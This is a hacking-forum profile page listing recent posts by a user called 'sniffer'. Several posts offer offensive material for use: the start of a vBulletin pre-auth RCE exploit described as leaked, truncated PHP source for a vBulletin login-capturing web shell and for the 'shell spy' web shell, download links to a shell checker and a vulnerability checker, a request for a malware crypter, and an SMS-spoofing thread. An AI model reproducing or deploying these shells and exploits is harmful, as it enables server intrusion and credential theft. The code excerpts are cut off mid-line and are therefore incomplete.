• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Recent content by sniffer

  1. S

    Crypting & Cracking Contest | End 2016

    Re: Crypting & Cracking Contest | End 2016 i need this crypte, please check your inbox bro
  2. S

    Penetration Testing skills

    Re: Penetration Testing skills more explain, what cms do you use ? do you neen pentest web app or pentest server?
  3. S

    Penetration Testing skills

    Re: Penetration Testing skills PM Me, [email protected]
  4. S

    Perl XML-RPC Pingback

    Re: XML-RPC Pingback this is php code (Layer 7) > <?php function partition( $list, $p ) { $listlen = count( $list ); $partlen = floor( $listlen / $p ); $partrem = $listlen % $p; $partition = array(); $mark = 0; for ($px = 0; $px < $p; $px++)...
  5. S

    Vbulletin 5.1.X unserialize 0day preauth RCE exploit

    > # Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit # Date: Nov 4th, 2015 # Exploit Author: hhjj # Vendor Homepage: http://www.vbulletin.com/ # Version: 5.1.x # Tested on: Debian # CVE : # I did not discover this exploit, leaked from the IoT. # Build the object php...
  6. S

    Firefox Under Fire: Anatomy of latest 0-day attack

    On the August 6th, the Mozilla Foundation released a security update for the Firefox web browser that fixes the CVE-2015-4495 vulnerability in Firefox’s embedded PDF viewer, PDF.js. This vulnerability allows attackers to bypass the same-origin policy and execute JavaScript remotely that will be...
  7. S

    Black Hat Security Conference August 2015

    SAN FRANCISCO — Pen and paper instead of a laptop. Cash instead of credit cards. Face-to-face chats instead of cell phones. That's the drill for the most cautious at two big computer security conferences taking place this week in Las Vegas. It's where security professionals need to be — and why...
  8. S

    Kali Linux 2.0 Release Day Scheduled

    Re: Kali Linux 2.0 Release Day Scheduled 8/11/2015 not July 6, 2015
  9. S

    Cheap SMS spoofing service with global reach

    Re: Free/cheap SMS spoofing service with global reach It is possible to send to Iran
  10. S

    Backend vBulletin Loginshell (version 1.9)

    [hide-thanks]> <?php/** * vBulletin 3.8.x-4.x Login Shell * Author: JB ([email protected]) * www.p0wersurge.com * 13/01/2014 (updated 26/07/2015) * Version 1.9 */#chdir('../');require_once('./global.php');define('SELF', $_SERVER['PHP_SELF']);@ini_set('display_errors'...
  11. S

    Shell Burner 1.0.1.3

    Basically allows you to check valid shells and server info [HIDE-THANKS] https://mega.co.nz/#!vQc1RLIZ!fyIdUDcXQLtFKWxBXiy2IjUw6lxfM5bY2ReiVwFMWMw [/HIDE-THANKS] Link Updated By swag666
  12. S

    IPB 3.4.6 Vuln Checker

    The program is to verify the site is vulnerable or not. [HIDE-THANKS] Download : https://mega.co.nz/#!PAJihABI!C07kCm5L-F_A2oKFVfeHL58RX9GvwoGUFT8gMeDyHuA Virus Scan : https://www.virustotal.com/ru/file/446fb289333ceed0acc404c5fd1fe10199764b6c5ed22146e3b9fd25c1fa5cf4/analysis/1437420419/...
  13. S

    Exploits Microsoft Word Local Machine Zone Remote Code Execution Vulnerability

    Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability Date: July 15th, 2015 Exploit Author: Eduardo Braun Prado Vendor Homepage : http://www.microsoft.com Version: 2007 Tested on: Microsoft Windows XP, 2003, Vista, 2008, 7, 8, 8.1 CVE: CVE-2015-0097...
  14. S

    WATOBO – The Web Application Security Auditing Toolbox

    WATOBO – The Web Application Security Auditing Toolbox – is intended to enable security professionals to perform highly efficient (semi-automated ) web application security audits. It is capable of passive as well as active scanning and this latest is its real value added. It enables to...
  15. S

    shell spy version php

    this shell is very Famous and i alwayes use this shell and share for my friends [HIDE-THANKS] > <?php $admin = array(); // ????????, true ?????, false ?????.??????? $admin['check'] = true; // ????????,??????? $admin['pass'] = 'f4f068e71e0d87bf0ad51e6214ab84e9'; //angel //??? cookie...
Back
Top